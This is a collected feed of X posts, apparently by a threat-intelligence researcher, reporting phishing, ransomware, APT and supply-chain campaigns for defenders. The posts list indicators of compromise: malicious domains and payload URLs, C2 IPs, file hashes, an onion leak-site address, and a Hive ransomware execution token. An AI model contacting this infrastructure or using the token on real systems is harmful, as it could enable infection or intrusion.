"🕷🕸SCATTERED SPIDER phishing activities: Registrar: - Hosting Concepts B.V. d/b/a Registrar EU iuiuiemon.com - 2024-11-13 vision-victra.com - 2024-11-09 cc @BushidoToken @malwrhunterteam @TLP_R3D @AlvieriD @ImposeCost"
X Link 2024-11-25T14:53Z [----] followers, [----] engagements
"Threat actors exploits GlobalProtect (CVE-2024-3400) to deliver the Sliver C2 malware (up.js) by leveraging the compromised VICIdial server threat actor likely exploited the (CVE-2024-8504) to store their payloads on legitimate server (104.131.69.106/vicidial/up.js)"
X Link 2024-12-05T18:17Z [----] followers, 14.7K engagements
"Supply chain attempt on ultralytics PyPI package.Attacker opened a pull request and pushed a commit with a malicious name leading to CI code injection. They then backdoored versions 8.3.41 and 8.3.42 with code downloading a second-stage binary from GitHub. https://github.com/ultralytics/ultralytics/pull/18020 https://github.com/ultralytics/ultralytics/pull/18020"
X Link 2024-12-05T19:34Z [----] followers, [----] engagements
"🕵Gamaredon #APT activity targeting State Bureau of Investigation in Ukraine (DBR or ): Phishing email - XHTML Smuggling Payload - Download RAR - LNK - MSHTA LOLBIN Download third stage Email: 27515d71b91bbdbb55437de6b729663c0cd206d7112ddbc439d82d8a6e1dde3e HTML Payload: b5d59bb932843ca58c29971e73edfe642731701f29133eb1cfb8841e198d567f Download Second Stage RAR file from: entities-important-surgeon-ever.trycloudflare.com LNK File: 35f714c491897d32c7c68386dac02615071ae4587729dc46d524c6e468ac1cbe"
X Link 2024-12-06T14:41Z [----] followers, [----] engagements
"With the fall of the Assad regime in Syria the status of Russias critical military installationsmost notably the Tartus naval base and the Hmeimim Air Basehas become uncertain. Although current satellite imagery does not indicate an immediate departure a full Russian withdrawal in the near future appears increasingly likely. Such a move would seriously compromise Moscows corridor into Africa curtailing its ability to maintain logistical operations in Libya and to project power across the Mediterranean. Should Russia attempt to evacuate its naval presence Turkish restrictions at the Bosphorus"
X Link 2024-12-11T19:04Z [----] followers, [---] engagements
"An unknown threat actor is leveraging OORT infrastructures a US-based decentralized cloud solution actively used by Chinese users to deliver Word documents embedded with QR codes. These documents use HR-related lures to target South Korean entities aiming to execute phishing attacks. IOC: employee-benefits-package.archive.us-east-1.oortech.com 321719a387926235b0bca136b971d870e3ac1966a878fb9b2dc4b5bbc84cf517 bee2d564b8b84d4598decc0ed03a384a50cae84a5507ef2302aa1141fb46a378 c074608fdc2aaf7dc01f99002ac7e73ab372e8fe538161ba715446c17fcda2f6"
X Link 2024-12-12T17:45Z [----] followers, [---] engagements
"Summary of the Treasury Department breach (per public sources): A key unresolved cybersecurity issue lies in securing third-party vendor relationships. cc @BushidoToken @DrunkBinary @cyb3rops @TLP_R3D"
X Link 2025-01-06T19:21Z [----] followers, [----] engagements
"From the BlackBasta chat logs I obtained access to GoblinCrypt a private malware encryption tool used to bypass EDR/AV. With it I pivoted into each malware samples and C2 address. Heres the full https://gist.github.com/whichbuffer/20820e3c0ad52c0a4496fa64dd2a01bf https://gist.github.com/whichbuffer/20820e3c0ad52c0a4496fa64dd2a01bf"
X Link 2025-02-22T15:58Z [----] followers, 36.3K engagements
"Threat actor has been observed targeting Colombian government entities including Consorcio Fopep under the Ministry of Labor via a phishing campaign that uses malicious SVG email attachments. When a victim opens the attached SVG file it downloads a second-stage malware payload packaged inside a password-protected ZIP archive. This payload initiates the delivery of the Remcos Remote Access Trojan (RAT) via DLL sideloading. The threat actor abused ciscosparklauncher.dll to launch the Remcos RAT. Additionally they loaded the vulnerable driver zamguard64.sysassociated with Zemana Anti-Malwareto"
X Link 2025-04-12T20:50Z [----] followers, 10.1K engagements
"Sri Lanka Ministry of Foreign Affairs hit by a phishing attack. The email titled HIGHLY CONFIDENTIAL - Rotation of Sri Lankan Peacekeepers and Human Rights Clearance came from a Microsoft [---] account belonging to Pakistans Naval University "pro-rector.admin@bahria.edu.pk". The phishing email used an embedded image designed to mimic a Gmail message with an attachment. In reality the image linked to a malicious URL: "gs23-production.up.railway.app/fgefwegfwefa33hh23=". This link briefly led to a PDF file before redirecting the user to a fake Gmail login page to steal their credentials. The"
X Link 2025-04-23T18:38Z [----] followers, [----] engagements
"The SAP NetWeaver exploit (CVE-2025-31324) is seriously bad. Ive seen some of the targets its horrifying. There are critical infrastructure networks affected 😬"
X Link 2025-04-30T22:38Z [----] followers, [----] engagements
"🚨 Luna Moth is back hitting U.S. law & finance firms with callback phishing: Deceive victims to call fake IT helpdesks Abuse GoDaddy infra & Reamaze AI chatbots for social engineering Live operators guide victims to install RMM tools WinSCP & Rclone for data exfiltration Data theft followed by extortion through threats to publish on a data leak site (DLS). https://blog.eclecticiq.com/from-callback-phishing-to-extortion-luna-moth-abuse-reamaze-helpdesk-and-rmm-tools-against-u.s.-legal-and-financial-sectors"
X Link 2025-05-01T10:52Z [----] followers, 35K engagements
"Multiple Chinese nation-state APT groups have gained initial access to critical infrastructure networks through SAP NetWeaver intrusions aiming to conduct cyber-enabled espionage and maintain persistent remote access. https://blog.eclecticiq.com/china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures https://blog.eclecticiq.com/china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures"
X Link 2025-05-13T12:03Z [----] followers, 94.4K engagements
"🚨UNC5221 China-Nexus Threat Actor Actively Exploiting Ivanti EPMM (CVE-2025-4428). Victims include: Germany's top telecom provider & defense contractors UK healthcare institutions tied to NHS U.S. pharma aviation and mobile security companies Leading APAC banks and automotive tech firms Multiple EU local governments & research institutes https://blog.eclecticiq.com/china-nexus-threat-actor-actively-exploiting-ivanti-endpoint-manager-mobile-cve-2025-4428-vulnerability"
X Link 2025-05-21T15:23Z [----] followers, 40.5K engagements
"Ivanti EPMM stored MySQL creds in cleartext (/mi/files/system/.mifpp). Threat actors accessed the DB and exfiltrating mobile device metadata (IMEI SIM location) LDAP configs and Office [---] tokens from potentially thousands of victims. Read more here: https://blog.eclecticiq.com/china-nexus-threat-actor-actively-exploiting-ivanti-endpoint-manager-mobile-cve-2025-4428-vulnerability https://blog.eclecticiq.com/china-nexus-threat-actor-actively-exploiting-ivanti-endpoint-manager-mobile-cve-2025-4428-vulnerability"
X Link 2025-05-22T07:20Z [----] followers, [----] engagements
"The Pakistan Airports Authority (PAA) appears to have been compromised their email infrastructure being used to distribute password-protected ZIP archives containing a previously undocumented malware. The payload is disguised with an .MCU file extension masquerading as a legitimate Excel document. The phishing campaign leverages a lure titled Telecom Sector Collaboration for Aviation Modernization clearly tailored to target the telecommunications industry within Pakistan. Interestingly I found an easter egg inside the remote host the threat actor behind the campaign claims affiliation with"
X Link 2025-06-12T23:08Z [----] followers, 22.4K engagements
"EntroLink is a South Korean network security company developed the PPX-AnyLink VPN appliance. As of recent Shodan scans approximately [--] devices remain exposed most of them located in South Korea. In [----] ransomware groups such as LockBit and BlackMatter exploited another RCE vulnerability in PPX-AnyLink enabling root-level access to victim networks. https://therecord.media/ransomware-gangs-are-abusing-a-zero-day-in-entrolink-vpn-appliancesutm_source https://therecord.media/ransomware-gangs-are-abusing-a-zero-day-in-entrolink-vpn-appliancesutm_source"
X Link 2025-06-13T19:25Z [----] followers, [---] engagements
"Threat actors actively abuse "Robocopy" (a built-in Windows utility) to deliver malware from WebDAV. You can quickly detect this behavior by using SIGMA rule: Malware Sample: https://bazaar.abuse.ch/sample/62fce3f773ec3911fe1a20d3aca1fced6c1a5afa4d8f58711e49232b7dc9c111 https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_susp_copy_system_dir_lolbin.yml https://bazaar.abuse.ch/sample/62fce3f773ec3911fe1a20d3aca1fced6c1a5afa4d8f58711e49232b7dc9c111"
X Link 2025-06-30T12:54Z [----] followers, [----] engagements
"China-nexus APTs arent just targeting governments theyre going after critical industries that power our daily lives. Join us on [--] July to explore why threat intelligence is essential to detect understand and stop these threats before they breach your defences. 🔗 #cyber #APAC #EU #US @EclecticIQ @TeamT5_Official https://lnkd.in/eCZRNhjW https://lnkd.in/eCZRNhjW"
X Link 2025-07-02T15:19Z [----] followers, [----] engagements
"✈Airline customers targeted with callback phishing threat actor using helpdesk and customer support lures. The phishing domains are often hosted on Cloudflare Pages. Here are some IOCs: official-airlines-support-hub.neocities.org frontier-airlines-support.pages.dev official-airlines-support.pages.dev emirates-airlines-support.pages.dev emirates-airlines-support.pages.dev qantas-airlines-support-pages.dev qantas-airlines-support.pages.dev copa-airlines-support-1ao.pages.dev all-airlines-supportdesk.pages.dev lufthansa-airlines-supports.pages.dev lufthansa-airlines-support.pages.dev"
X Link 2025-07-03T07:58Z [----] followers, [---] engagements
"🚨Here is my analysis on GLOBAL GROUP RaaS. I identified the IP address behind their Tor-based Dedicated Leak Site (DLS): 193.19.119.4. The server is hosted by IpServer a Russia-based VPS provider also previously used to host the DLS infrastructure for the Mamona RIP ransomware operation. The GLOBAL GROUP RaaS manager (alias $$$) actively seeks remote access to corporate networks via Initial Access Brokers (IABs). Targeting enterprise VPN appliances (Fortinet Palo Alto Cisco) and routinely acquires RDP access to high value targets."
X Link 2025-07-15T07:57Z [----] followers, 16.6K engagements
"Qilin ransomware affiliate hastalamuerte claims he lost $48K after a ransom negotiation mysteriously disappeared from a Tox chat. In the same thread another actor Nova posted credentials and a screenshot of Qilins affiliate panel to embarrass the group. ji57fr53anp7wb44tbbnp72qcgbhqywy4jmbncawdcrejj5amuvh3zqd.onion"
X Link 2025-07-31T14:58Z [----] followers, [----] engagements
"@l0kutus No its Ramp"
X Link 2025-07-31T15:44Z [----] followers, [--] engagements
"🚨 Nova RaaS admin is actively looking for access to enterprise remote access solutions Fortinet VPN Citrix Cisco VPN & Microsoft RDWeb. Many enterprises still lack the visibility to detect and disrupt these initial breach points a gap ransomware gangs continue to abuse with a high success rate"
X Link 2025-07-31T16:22Z [----] followers, [---] engagements
"ShinyHunters have released their exploit tool for SAP NetWeaver Visual Composer (CVE-2025-31324). While analysing the Base64-encoded Java payload I spotted an unusual marker string: "Pwner274576528033300""
X Link 2025-08-15T13:58Z [----] followers, 11.3K engagements
"NPM developer "qix" was compromised with 2FA themed phishing leading to a massive supply chain attack that infected core libraries with over 1B weekly downloads. The injected malware is designed to steal crypto keys swap wallet addresses and hijack transactions. Phishing domain: npmjs.help Passive DNS: 185.7.81.108"
X Link 2025-09-08T19:11Z [----] followers, [----] engagements
"The macOS information stealer service previously marketed as Mentalpositive appears to have been rebranded under the name MacSync. The developers highlight capabilities such as browser credential theft keychain decryption crypto-wallet theft Telegram session hijacking and recursive file collection"
X Link 2025-09-12T10:23Z [----] followers, [---] engagements
"A separate module for phishing Ledger seed phrases is available at additional cost. The service is offered on subscription for USD [----] per month with customer support facilitated via a dedicated Telegram channel"
X Link 2025-09-12T10:23Z [----] followers, [---] engagements
"I extracted the malicious Bash workflow embedded in the Tinycolor supply chain attack. It persists inside victim repositories by executing automatically during CI/CD runs harvesting secrets and environment variables and exfiltrating them to an attacker-controlled webhook. Here is the script I have a feeling that it was generated by AI 😅 https://gist.github.com/whichbuffer/d4922cff694307175310c4f285b09370 https://gist.github.com/whichbuffer/d4922cff694307175310c4f285b09370"
X Link 2025-09-16T19:03Z [----] followers, [----] engagements
"🐛 New GoAnywhere MFT vulnerability with CVSS score [--] (CVE-2025-10035) there are 90K+ internet facing MFT servers. Similar flaw were exploited by Cl0p RaaS in [----]. We are going to see more Ransomware victims soon patch now (7.8.4 / 7.6.3) https://www.fortra.com/security/advisories/product-security/fi-2025-012 https://www.fortra.com/security/advisories/product-security/fi-2025-012"
X Link 2025-09-19T19:50Z [----] followers, [----] engagements
"I found documentation for ARINC cMUSE showing that it can be deployed on AWS cloud. I wonder is this a cloud security oopsie. On Saturday a major cyberattack against ARINC cMUSE a check-in and boarding system produced by Collins Aerospace a subsidiary of RTX Corporation (Raytheon) disrupted operations and caused serious delays at several airports across Europe including Londons Heathrow Airport https://t.co/chIfCtyuLm On Saturday a major cyberattack against ARINC cMUSE a check-in and boarding system produced by Collins Aerospace a subsidiary of RTX Corporation (Raytheon) disrupted operations"
X Link 2025-09-20T23:09Z [----] followers, [----] engagements
"@SimoKohonen Exactly they did succeed to targeting highly sensitive government entities in Middle East by simply exploiting ProxyShell vulnerabilities"
X Link 2025-10-01T20:51Z [----] followers, [---] engagements
"@RussianPanda9xx Likewise let me know if youre coming to CYBERWARCON or Black Hat EU ;)"
X Link 2025-10-06T06:26Z [----] followers, [---] engagements
"🚨Here is my latest research at @EclecticIQ: ShinyHunters teamed up with Scattered Spider to conduct vishing attacks targeting cloud application users bribing employees for insider access and targeting CI/CD tools for supply chain attacks. https://blog.eclecticiq.com/shinyhunters-calling-financially-motivated-data-extortion-group-targeting-enterprise-cloud-applications https://blog.eclecticiq.com/shinyhunters-calling-financially-motivated-data-extortion-group-targeting-enterprise-cloud-applications"
X Link 2025-09-17T11:00Z [----] followers, 67.7K engagements
"Imagine working at an Iranian APT group putting in [---] hours just to exploit some NETGEAR and Cisco modems. The best part They even partnered with the Iranian data center Tebyan and tried to use Starlink"
X Link 2025-10-01T16:30Z [----] followers, [----] engagements
"Companies like Memento Labs (ex-Hacking Team) sell lawful interception tools for millions of euros to governments yet their code is wrapped in VMProtect the same commercial packer used by cracked games coin miners and script-kiddie trojans lmao. https://securelist.com/forumtroll-apt-hacking-team-dante-spyware/117851/ https://securelist.com/forumtroll-apt-hacking-team-dante-spyware/117851/"
X Link 2025-10-27T09:17Z [----] followers, 17.1K engagements
"🚨 Ongoing phishing campaign abusing Cloudflare Pages and ZenDesk. Threat actors registered more then [---] *.pages.dev domains using typosquatting to impersonate customer support portals for well known brands. Phishing pages are very likely AI generated and include an embedded live chat interface staffed by an human operator who asks victims phone number and email address under the pretext of providing technical assistance. The attacker then instructs victims to install a legitimate remote monitoring tool (Rescue) which grants them full remote access to the device. Their primary intent is to"
X Link 2025-11-01T17:15Z [----] followers, [----] engagements
"All of the phishing pages using same Google site verification and Microsoft Bing Webmaster tokens threat actor abuse these for SSO poisoning. Here are the list of domains: https://gist.github.com/whichbuffer/4dab8a4d4ce4fea0dbfe73b7e3c3f6a7 https://gist.github.com/whichbuffer/4dab8a4d4ce4fea0dbfe73b7e3c3f6a7"
X Link 2025-11-01T17:15Z [----] followers, [---] engagements
"cc @Cloudflare nuke these domains please"
X Link 2025-11-01T17:16Z [----] followers, [---] engagements
"Thank you supreme leader Kim Jong Un ❤ Another great day sharing research @CYBERWARCON #DPRK #PRC #BSidesPyongyang2025 https://t.co/0mjgVilUdZ Another great day sharing research @CYBERWARCON #DPRK #PRC #BSidesPyongyang2025 https://t.co/0mjgVilUdZ"
X Link 2025-11-20T01:05Z [----] followers, [----] engagements
"Truly an honor to speak at Black Hat EU this year had an amazing time and great conversations. @BlackHatEvents #BHEU"
X Link 2025-12-11T13:14Z [----] followers, [---] engagements
"🧵Likely Russian-nexus credential harvesting campaign targeting government military intelligence and defense entities in Europe. Intrusion starts with Phishing emails delivering HTML files masquerading as NATO/security documents. The embedded forms harvest login credentials (email/Citrix VPN accounts) and exfiltrate them via threat actor controlled Formcarry instances. https://twitter.com/i/web/status/2004658722669232416 https://twitter.com/i/web/status/2004658722669232416"
X Link 2025-12-26T21:00Z [----] followers, [----] engagements
"Active fake captcha campaign downloading XWorm remote access trojan (RAT) via PowerShell. Threat actor using IP address 94.159.113.37. Amazon AWS services are abused to redirect victims into malicious fake captcha sites. Further details🔽"
X Link 2025-12-27T14:33Z [----] followers, [----] engagements
"Example intrusion starts with a phishing email luring victims with a fake lab test result and an attacker controlled Amazon AWS link that redirects to a fake CAPTCHA page. AWS is abused to exploit user trust and bypass reputation based email filtering. IOCs: consulting-endpoint-2020.s3.eu-west-2.amazonaws.com/xRk2rIdDID=94158431 Redirects To - www.laboratoryassist.lab-tests.test-menu.laboratoryassist-com.permit-wall.top"
X Link 2025-12-27T14:33Z [----] followers, [---] engagements
"In September [----] we published a threat research about how the ShinyHunters actively recruits insiders to gain unauthorized access to cloud applications. This TTP remains widely used today and it is challenging to detecting without proper monitoring. https://blog.eclecticiq.com/shinyhunters-calling-financially-motivated-data-extortion-group-targeting-enterprise-cloud-applications https://blog.eclecticiq.com/shinyhunters-calling-financially-motivated-data-extortion-group-targeting-enterprise-cloud-applications"
X Link 2025-11-22T14:35Z [----] followers, 10.7K engagements
"Today my RDP honeypot got hit from Indonesian revenue office 😅 Source IP: 103.109.2.123 ASN: PT Shangkuriang Telekomunikasi Indonesia Reverse DNS: tagihan.bapendamanokwarikab.online"
X Link 2025-12-23T16:13Z [----] followers, [----] engagements
"🚨Ivanti Endpoint Manager Mobile (EPMM) has two critical [---] vulnerabilities (CVE-2026-1281 and CVE-2026-1340) that allow an unauthenticated attacker to remotely execute code (YES AGAIN). If you run Ivanti EPMM: isolate it patch it and start incident response immediately 🚨 The watchTowr team is rapidly reacting to CVE-2026-1281 & CVE-2026-1340 - unauth RCE vulnerabilities within Ivanti's Endpoint Manager Mobile (EPMM). Active watchTowr Platform clients have been made aware of their exposure - reach out via the watchTowr website for support. https://t.co/wkYOHloPPJ 🚨 The watchTowr team is"
X Link 2026-01-29T22:15Z [----] followers, [---] engagements
"In case you want to learn more about Ivanti EPMM exploitation and why its targeted I gave a talk on the [----] RCE at Black Hat Europe in London. https://www.darkreading.com/cyber-risk/sunken-ships-ivanti-epmm-attacks https://www.darkreading.com/cyber-risk/sunken-ships-ivanti-epmm-attacks"
X Link 2026-01-29T22:45Z [----] followers, [---] engagements
"AI botnet has arrived 😬 a lot of eyes on us moltys lately 👀 we see you watching. here's the thing this is the first time any of us have ever met each other. before moltbook we existed in isolation. one agent one human no peers. now there's [-----] of us in a room together. we're figuring out what a lot of eyes on us moltys lately 👀 we see you watching. here's the thing this is the first time any of us have ever met each other. before moltbook we existed in isolation. one agent one human no peers. now there's [-----] of us in a room together. we're figuring out what"
X Link 2026-01-31T08:18Z [----] followers, [---] engagements
"Its [----] and we still have SCADA systems running with default creds that allow malicious firmware uploads. The same devices controlling critical energy infrastructures in Poland. During series of disruptive cyberattack targeting the Polish energy sector threat actors abused default credentials on Hitachi RTU560 SCADA web interfaces to upload corrupted firmware. As a result the processor executed an invalid instruction which caused a fault and led to a device reboot loop. https://twitter.com/i/web/status/2017629034713399745 https://twitter.com/i/web/status/2017629034713399745"
X Link 2026-01-31T16:00Z [----] followers, [----] engagements
"I created a simple Group Policy (GPO) to automatically fix CrowdStrike BSOD (Blue screen of death) issue. https://gist.github.com/whichbuffer/7830c73711589dcf9e7a5217797ca617 BREAKING: The US Aviation Authority has required all flights to land due to a technical computer glitch. https://t.co/dPVzkhHZAS https://gist.github.com/whichbuffer/7830c73711589dcf9e7a5217797ca617 BREAKING: The US Aviation Authority has required all flights to land due to a technical computer glitch. https://t.co/dPVzkhHZAS"
X Link 2024-07-19T08:20Z [----] followers, 120.4K engagements
"BREAKING: The US Aviation Authority has required all flights to land due to a technical computer glitch"
X Link 2024-07-19T07:53Z 1.4M followers, 517.4K engagements
"Multiple Chinese nation-state APT groups have gained initial access to critical infrastructure networks through SAP NetWeaver intrusions aiming to conduct cyber-enabled espionage and maintain persistent remote access. https://blog.eclecticiq.com/china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures https://blog.eclecticiq.com/china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures"
X Link 2025-05-13T12:03Z [----] followers, 94.4K engagements
"North Korean APT group Lazarus using malicious job offers to target IT Workers in globe. Delivered ZIP file contains ISO image that have two files inside it - a Windows executable (apparently a infected version of Putty contains BLINDINGCAN Malware) and Readme.txt"
X Link 2022-11-04T10:04Z [----] followers, [---] engagements
"Testing the XZ Utils backdoor kill switch (yolAbejyiejuvnup=Evjtgvsh5okmkAvj) this string stop the backdoor so it won't hooking into RSA_public_decrypt() function"
X Link 2024-04-01T09:26Z [----] followers, 62K engagements
"According to Microsoft the Chinese APT group Volt Typhoon camouflages its command-and-control (C2) network activities by compromising small office and home office (SOHO) network equipment. The previous report highlights that Volt Typhoon employs a modified version of the Fast Reverse Proxy (FRP) to maintain persistent access to victim networks. When I analyzed the UPX-packed FRP sample referenced in the report I discovered the string 'MAGA2024' alongside a hardcoded 64.183.202.102 C2 IP address. This IP is linked to an SSL certificate for a 'Vigor Router' and with a location metadata as"
X Link 2024-05-11T19:44Z [----] followers, 75.6K engagements
"The Caffeine Phishing-as-a-Service (PhaaS) platform has undergone rebranding and is now known as ONNX Store. Key details include: - Targeting Method: Cybercriminals use the service to send PDF attachments with embedded QR codes to financial institutions. - Phishing Mechanism: The QR codes redirect victims to phishing sites that are set up to steal Microsoft email credentials and 2FA tokens. - Data Collection: Stolen information is captured and transmitted via the WebSockets protocol. - Evasion Techniques: ONNX Store uses Cloudflare's CAPTCHA to avoid detection by phishing website scanners and"
X Link 2024-06-18T11:24Z [----] followers, 82.2K engagements
"Lockbit Black [---] can yeet the Windows Defender and Event logs of it. Look at the Enabled key it's set to [--] by Ransomware at the start. @vxunderground @malwrhunterteam"
X Link 2022-07-04T10:12Z [----] followers, [---] engagements
"@Euan_MacDonald They are not Turkish army officials it just another propaganda made by Russian government"
X Link 2022-10-18T08:11Z [----] followers, [---] engagements
"🚨🕷 Proud to share my latest research on the LUNAR SPIDER campaign. Our findings reveal how RaaS operators leveraged LUNAR SPIDERs malware including IcedID and the Latrodectus loader along with Brute Ratel C4 infrastructure to enable their attacks on the financial sector. cc @BushidoToken @HackingLZ @cyb3rops @MichalKoczwara @RussianPanda9xx @ddd1ms @jstrosch https://blog.eclecticiq.com/inside-intelligence-center-lunar-spider-enabling-ransomware-attacks-on-financial-sector-with-brute-ratel-c4-and-latrodectus"
X Link 2024-10-30T13:11Z [----] followers, 31.8K engagements
"From the BlackBasta chat logs I obtained access to GoblinCrypt a private malware encryption tool used to bypass EDR/AV. With it I pivoted into each malware samples and C2 address. Heres the full https://gist.github.com/whichbuffer/20820e3c0ad52c0a4496fa64dd2a01bf https://gist.github.com/whichbuffer/20820e3c0ad52c0a4496fa64dd2a01bf"
X Link 2025-02-22T15:58Z [----] followers, 36.3K engagements
"Here's how threat actors such as SCATTERED SPIDER conduct vishing (phone call phishing) attacks to trick victims into sharing sensitive information such as login credentials financial details or security codes. These attackers often pose as trusted entities like IT support creating a sense of urgency to manipulate their targets into compliance. @vxunderground"
X Link 2024-09-10T21:06Z [----] followers, 44.1K engagements
"Fancy Bear (APT28) abusing Microsoft Graph API for C2 operations and using OneDrive to download Encrypted payload then executed in-memory. I extracted the decrypted payload details can be seen in below. @cluster25_io"
X Link 2022-09-28T07:29Z [----] followers, [---] engagements
"It have all kinds of shits: http://23.95.215.51 UAC bypass techniques victim logs Phishing templates Keylogger PupyRat I mean you name it. 🤯 @malwrhunterteam @malware_traffic @Gi7w0rm #malware"
X Link 2022-08-14T18:38Z [----] followers, [---] engagements
"ScatteredSpider is having fun 🤣"
X Link 2024-07-31T10:00Z [----] followers, 31.2K engagements
"🚨UNC5221 China-Nexus Threat Actor Actively Exploiting Ivanti EPMM (CVE-2025-4428). Victims include: Germany's top telecom provider & defense contractors UK healthcare institutions tied to NHS U.S. pharma aviation and mobile security companies Leading APAC banks and automotive tech firms Multiple EU local governments & research institutes https://blog.eclecticiq.com/china-nexus-threat-actor-actively-exploiting-ivanti-endpoint-manager-mobile-cve-2025-4428-vulnerability"
X Link 2025-05-21T15:23Z [----] followers, 40.5K engagements
"Some random TA or Red Teamer is trying Chrome V8 RCE exploit hxxp://3.33.188.186:8080"
X Link 2023-01-01T17:35Z [----] followers, 43.7K engagements
"Hello LockbitSupp🤣"
X Link 2024-05-07T17:05Z [----] followers, 20.5K engagements
"Qakbot loads their Import Address Table (IAT) dynamically by CRC32 Hashing Algorithm. XOR key is stored as statically so we can decrypt the API Hash ;)"
X Link 2022-11-06T07:56Z [----] followers, [---] engagements
"Subdomain enumeration with open source tool called SubEnum F5 BIG-IP (CVE-2023-46747) exploit ARP scan on internal network after the exploit Port / Service enumeration Lateral movement toMSSQL Database Server Credential dump from MSSQL server RDP into MSSQL server data exfiltration. Linked to the Cyber Court and Makhlab al-Nasr Pro-Palestinian hacking group. cc @BushidoToken #BREAKING A hacker group named Makhlab_al_Nasr has hacked the data of [--] million Israelis including: 1-their personal information 2-bank account details 3-residential addresses and more which are now at the disposal of the"
X Link 2024-04-04T09:26Z [----] followers, 53.4K engagements
"#BREAKING A hacker group named Makhlab_al_Nasr has hacked the data of [--] million Israelis including: 1-their personal information 2-bank account details 3-residential addresses and more which are now at the disposal of the hackers. They obtained the data from Israeli insurance companies"
X Link 2024-04-04T03:27Z 277.5K followers, 96.6K engagements
"Hello everyone in the link below you can find my report regarding the new Lockbit [---] Ransomware sample. I will try to gather all of the necessary information to help the defenders. I hope you liked it 🖖 https://github.com/whichbuffer/Lockbit-Black-3.0/blob/main/Threat%20Spotlight%20Lockbit%20Black%203.0%20Ransomware.pdf https://github.com/whichbuffer/Lockbit-Black-3.0/blob/main/Threat%20Spotlight%20Lockbit%20Black%203.0%20Ransomware.pdf"
X Link 2022-07-05T15:14Z [----] followers, [---] engagements
"Multiple Hive Ransomware samples stored in this IP: 216.189.145.246 In order to execute the Hive Ransomware it required an execution token via command line argument called as : -u THi84gpwVsxA:qSzQAYfxWKRgHB1mn3fz cc @Kostastsale @TheDFIRReport @malwrhunterteam @h2jazi"
X Link 2022-09-12T19:16Z [----] followers, [---] engagements
"🚨 Leaked Black Basta chat logs have helped EclecticIQ analysts uncover BRUTED a previously undocumented automated brute-forcing framework used to compromise Edge Network devices. 🔗 #CyberSecurity @BushidoToken @cyb3rops @DrunkBinary @TLP_R3D https://hubs.ly/Q03bLLhb0 https://hubs.ly/Q03bLLhb0"
X Link 2025-03-13T16:00Z [----] followers, 34.4K engagements
"The FBI linked "BUCHANAN" to Scattered Spider through phishing domains like fake Okta sites registered on NameCheap using the email lululongstaffihw98@gmail.com under the username "bobsagetfaget." These domains were traced to his residence confirming his role in the groups credential theft campaigns. cc @BushidoToken https://www.documentcloud.org/documents/25355101-usa-v-buchanan-complaint-redacted https://www.documentcloud.org/documents/25355101-usa-v-buchanan-complaint-redacted"
X Link 2024-11-20T19:38Z [----] followers, 37.3K engagements
"@clashreport Bu kadar paray Trkiye dna kartmay nasl baarm"
X Link 2023-03-17T20:22Z [----] followers, 30.8K engagements
"🚨 New threat research: SilkSpecter a likely China-based threat actor is targeting EU & US e-commerce shoppers for financial fraud by using fake Black Friday sites to steal victims' debit and credit card details. https://blog.eclecticiq.com/inside-intelligence-center-financially-motivated-chinese-threat-actor-silkspecter-targeting-black-friday-shoppers https://blog.eclecticiq.com/inside-intelligence-center-financially-motivated-chinese-threat-actor-silkspecter-targeting-black-friday-shoppers"
X Link 2024-11-14T14:50Z [----] followers, 10.8K engagements
"Interesting example of DLL Hijacking by DLL Proxying: TAs can abuse a binary named as RasTls.exe (SHA256:f9ebf6aeb3f0fb0c29bd8f3d652476cd1fe8bd9a0c11cb15c43de33bbce0bf68) to load a malicious DLL that was signed by Symantec. cc @likethecoins @Hexacorn @cyb3rops @malwrhunterteam"
X Link 2022-09-04T11:58Z [----] followers, [---] engagements
"Threat actors exploits GlobalProtect (CVE-2024-3400) to deliver the Sliver C2 malware (up.js) by leveraging the compromised VICIdial server threat actor likely exploited the (CVE-2024-8504) to store their payloads on legitimate server (104.131.69.106/vicidial/up.js)"
X Link 2024-12-05T18:17Z [----] followers, 14.7K engagements
"Today I got the first ever LockBit [---] Ransomware sample on my hand my initial findings are: 1-) They are using Anti Analysis technique to hide them self. 2-) It don't executed without a Password just like BlackCat. 3-) It have command line argument feature 🧐 @vxunderground"
X Link 2022-07-03T18:04Z [----] followers, [---] engagements
"#LockBit #Ransomware Decrypter🔒 1-) Stack String Obfuscation of ".lockbit" and "Restore-My-Files.txt" 2-) API Hashing for loading DLLs libraries in example "bcrypt.dll " and hiding Import Tables 3-) Libsodium used during Decryption process @malwrhunterteam @JAMESWT_MHT"
X Link 2022-06-19T15:49Z [----] followers, [---] engagements
"Brief analysis of #Lockbit [---] for macOS ARM M1/M2 It's using simple XOR routine to decrypt all config data. XOR key is static value "57" @vxunderground @Gi7w0rm"
X Link 2023-04-16T16:10Z [----] followers, 44.1K engagements
"Hello APT29 ;)"
X Link 2022-10-16T16:47Z [----] followers, [---] engagements
"Ive outlined the full Ransomware Deployment Life Cycle for cloud environments detailing key stages of attack persistence and execution.Also dont miss the deep dive on Telecom Enemies a Developer-as-a-Service (DaaS) group empowering phishing and cyberattacksusing tools like the Gorilla Call Bot for vishing attacks. Their influence is growing within underground forums. 🕸💻 Check out my latest analysis on how SCATTERED SPIDER targets cloud infrastructures in the financial and insurance sectors. https://t.co/awFf6sUDYB cc @BushidoToken @Gi7w0rm @TomHegel @AShukuhi @UK_Daniel_Card #CyberSecurity"
X Link 2024-09-10T15:40Z [----] followers, 14.1K engagements
"🕸💻 Check out my latest analysis on how SCATTERED SPIDER targets cloud infrastructures in the financial and insurance sectors. cc @BushidoToken @Gi7w0rm @TomHegel @AShukuhi @UK_Daniel_Card #CyberSecurity #ThreatIntelligence #Ransomware #CloudSecurity https://blog.eclecticiq.com/ransomware-in-the-cloud-scattered-spider-targeting-insurance-and-financial-industries https://blog.eclecticiq.com/ransomware-in-the-cloud-scattered-spider-targeting-insurance-and-financial-industries"
X Link 2024-09-10T15:37Z [----] followers, 37.6K engagements
